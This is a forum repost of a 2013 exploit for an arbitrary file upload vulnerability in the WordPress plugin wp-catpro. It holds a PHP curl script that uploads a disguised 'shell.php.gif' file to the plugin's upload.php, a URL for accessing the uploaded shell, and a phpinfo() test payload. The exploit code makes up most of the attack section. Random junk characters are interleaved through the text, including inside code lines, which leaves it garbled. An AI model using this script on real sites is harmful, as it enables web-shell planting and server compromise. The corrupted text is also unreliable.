Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
4 ^. ^/ J7 ?% P# Y! A7 {#-----------------------------------------------------------------------
4 V& L/ @# w2 e# u9 |2 [8 t0 i ; _% \7 d1 B( b, L$ z% E
作者 => Zikou-161 e2 E6 r0 |* }' M+ x
邮箱 => zikou16x@gmail.com
8 n- H0 g5 A) M$ Z测试系统 : Windows 7 , Backtrack 5r3
; R) T7 y" R7 J下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
8 `# p0 V4 r: u! l( f/ X3 }####6 o5 S5 c0 u! T/ S+ v4 J
" P* Z k9 S, y0 v#=> Exploit 信息:& ^9 X, ~/ W" h- A3 x9 `
------------------
/ N7 v% f5 O$ a" ~& _* D: _2 c. \/ G# 攻击者可以上传 file/shell.php.gif
2 i+ y0 c. J) g2 r# ("jpg", "gif", "png") // Allowed file extensions/ Z1 K5 `. T1 u0 S! P8 ~: C' I" Q
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
9 N9 d; E& W/ S0 o# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)) x/ i2 O: E7 `0 X2 ]. E
------------------. _9 w# ?; v# k9 Y% Z8 C
& C2 q2 I# @0 q. m/ v$ j0 V#=> Exploit1 R5 F1 W$ B! v' k
-----------
7 F! ^: y- G* D7 V: ~<?php9 l9 B9 l& @- `. U; s
! n+ i |$ x/ K. r4 S$uploadfile="zik.php.gif";
2 n5 q. X3 W% ?4 m$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");2 o, c" z" z" P K* ^4 P9 e) D5 M% n
curl_setopt($ch, CURLOPT_POST, true);
- G5 O4 u! _; d" j7 jcurl_setopt($ch, CURLOPT_POSTFIELDS,
$ s4 N( j1 z8 t+ sarray('Filedata'=>"@$uploadfile",
/ ]+ F. A+ y# G'folder'=>'/wp-content/uploads/catpro/'));1 a7 D; W, e; @" E
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
6 s* | B9 @- e0 t5 t$postResult = curl_exec($ch);
/ H7 M, ^ ] b. b7 \) xcurl_close($ch);
, W1 T- t1 r2 _, s | / f3 }& H- U) S1 y1 t
print "$postResult";
* s. g5 F' G6 ~4 }2 X $ W$ J4 n& O3 z6 d- E( i
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
5 P, x n e; R. H# l ?>; a8 e2 ^0 H) m# Q
<?php
" j* O; K5 T( ]: y, \8 Q( dphpinfo();; y ^2 d! x7 _+ H
?> |
发表于 2013-2-27 20:12:43
收藏
支持
反对